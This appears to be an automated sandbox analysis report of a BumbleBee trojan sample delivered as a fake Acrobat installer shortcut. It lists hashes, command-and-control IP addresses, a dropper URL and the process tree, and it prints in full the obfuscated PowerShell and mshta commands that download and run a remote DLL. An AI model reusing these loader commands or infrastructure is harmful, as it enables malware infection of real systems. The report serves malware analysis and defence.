bumblebee | 48d585ca3a477ef7e8f0983735903335d9a5327f5fc434c222b6f551f7c0dc68

General

Target

AcrobatInstaller.lnk
Size

1KB
MD5

f115333f8c6d19a22743ad549019db28
SHA1

e00bbf362c53f58af8b66dedbd44e84a46c97411
SHA256

48d585ca3a477ef7e8f0983735903335d9a5327f5fc434c222b6f551f7c0dc68
SHA512

ff7e372b39c7829e6303eaa642a3b36a45f5eeadfcb832bd692a0b14c5d67b108161c0826d8d475a8c6d595f5199e95e39d697d245a90e486ff191b369d7c90a

Score

10^/10

bumblebee 1011t1 trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://cruds-club.com/AcrobatInstaller.hta

Extracted

Family

bumblebee

Botnet

1011t1

C2

64.44.135.140:443

103.144.139.150:443

146.70.149.43:443

rc4.plain

Signatures

BumbleBee
BumbleBee is a webshell malware written in C++.
trojan bumblebee

Blocklisted process makes network request 5 IoCs

flow	pid	Process
2	3788	mshta.exe
4	3788	mshta.exe
6	3788	mshta.exe
8	3788	mshta.exe
11	4372	powershell.exe

Downloads MZ/PE file

Loads dropped DLL 1 IoCs

pid	Process
3352	rundll32.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
3352	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4524	3352	WerFault.exe	72

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4932	powershell.exe
4932	powershell.exe
4932	powershell.exe
4372	powershell.exe
4372	powershell.exe
4372	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4932	powershell.exe
Token: SeDebugPrivilege	4372	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2540 wrote to memory of 4932	2540	cmd.exe	67
PID 2540 wrote to memory of 4932	2540	cmd.exe	67
PID 4932 wrote to memory of 3788	4932	powershell.exe	68
PID 4932 wrote to memory of 3788	4932	powershell.exe	68
PID 3788 wrote to memory of 4372	3788	mshta.exe	70
PID 3788 wrote to memory of 4372	3788	mshta.exe	70
PID 4372 wrote to memory of 3352	4372	powershell.exe	72
PID 4372 wrote to memory of 3352	4372	powershell.exe	72

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\AcrobatInstaller.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2540
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\?i*\S*3?\m*ta.e* ('https://cruds-club.com/AcrobatInstaller' + '.h' + 'ta')
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4932
- - C:\Windows\System32\mshta.exe
    "C:\Windows\System32\mshta.exe" https://cruds-club.com/AcrobatInstaller.hta
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory
    PID:3788
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function MWG($Fii, $erX){[IO.File]::WriteAllBytes($Fii, $erX)};function LaM($Fii){if($Fii.EndsWith((HQD @(6236,6290,6298,6298))) -eq $True){rundll32.exe $Fii , mruAlloc }elseif($Fii.EndsWith((HQD @(6236,6302,6305,6239))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $Fii}elseif($Fii.EndsWith((HQD @(6236,6299,6305,6295))) -eq $True){misexec /qn /i $Fii}else{Start-Process $Fii}};function NRU($eMW){$QMX = New-Object (HQD @(6268,6291,6306,6236,6277,6291,6288,6257,6298,6295,6291,6300,6306));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$erX = $QMX.DownloadData($eMW);return $erX};function HQD($vfw){$ZTq=6190;$ViK=$Null;foreach($aFd in $vfw){$ViK+=[char]($aFd-$ZTq)};return $ViK};function Xxb(){$Bpm = $env:AppData + '\';;;$WbktydWSz = $Bpm + '1011t1_cr1.dll'; if (Test-Path -Path $WbktydWSz){LaM $WbktydWSz;}Else{ $jPzXrDoPH = NRU (HQD @(6294,6306,6306,6302,6305,6248,6237,6237,6289,6304,6307,6290,6305,6235,6289,6298,6307,6288,6236,6289,6301,6299,6237,6239,6238,6239,6239,6306,6239,6285,6289,6304,6239,6236,6290,6298,6298));MWG $WbktydWSz $jPzXrDoPH;LaM $WbktydWSz;};;}Xxb;
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4372
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\1011t1_cr1.dll mruAlloc
        5⤵
        Loads dropped DLL
        Suspicious use of NtCreateThreadExHideFromDebugger
        
        PID:3352
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3352 -s 420
        6⤵
        Program crash
        
        PID:4524

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
c6b0a774fa56e0169ed7bb7b25c114dd

SHA1
bcdba7d4ecfff2180510850e585b44691ea81ba5

SHA256
b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9

SHA512
42295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
33e3ddd79c76b46a9f302752ede2198d

SHA1
5526fea146b92d5704cebb362cc32cc9a5a5679b

SHA256
b30cf987d8413d00c75e5d9df0cbc9de78c0f9fef790dbb0e393febabedf34d0

SHA512
d291c6930111498b2c5be8e722f8ddaf79be8312fd2c6ba965c1df6866c6084089a041cea71cafa519b833ee314d3af6459b29e70b3d1c7503832a85536ce39f

Download Submit
C:\Users\Admin\AppData\Roaming\1011t1_cr1.dll

Filesize
830KB

MD5
19f8c4fb6b729f856173beba2b8cfc1d

SHA1
37faae961fa1ca194a2d29a5ac4958e91f0c4c9c

SHA256
ea96dbb2ffa8cd6ab05a31e55b6452a00784366bb6316dd787acb07e82cae9f9

SHA512
4e5d97f0d0c2f7b8384dffd922e8374c5ffc781b1cf0adf9c08a647982b2eba3c90f248014bbb2d50c8c56940fc06c737e6db388e3df08f5a781495b54e03308

Download Submit
\Users\Admin\AppData\Roaming\1011t1_cr1.dll

Filesize
830KB

MD5
19f8c4fb6b729f856173beba2b8cfc1d

SHA1
37faae961fa1ca194a2d29a5ac4958e91f0c4c9c

SHA256
ea96dbb2ffa8cd6ab05a31e55b6452a00784366bb6316dd787acb07e82cae9f9

SHA512
4e5d97f0d0c2f7b8384dffd922e8374c5ffc781b1cf0adf9c08a647982b2eba3c90f248014bbb2d50c8c56940fc06c737e6db388e3df08f5a781495b54e03308

Download Submit
memory/3352-156-0x0000022F50DB0000-0x0000022F50EF9000-memory.dmp

Filesize
1.3MB

Download
memory/3352-157-0x0000022F4F350000-0x0000022F4F3C3000-memory.dmp

Filesize
460KB

Download
memory/4932-120-0x000001CA74F20000-0x000001CA74F42000-memory.dmp

Filesize
136KB

Download
memory/4932-123-0x000001CA75320000-0x000001CA75396000-memory.dmp

Filesize
472KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads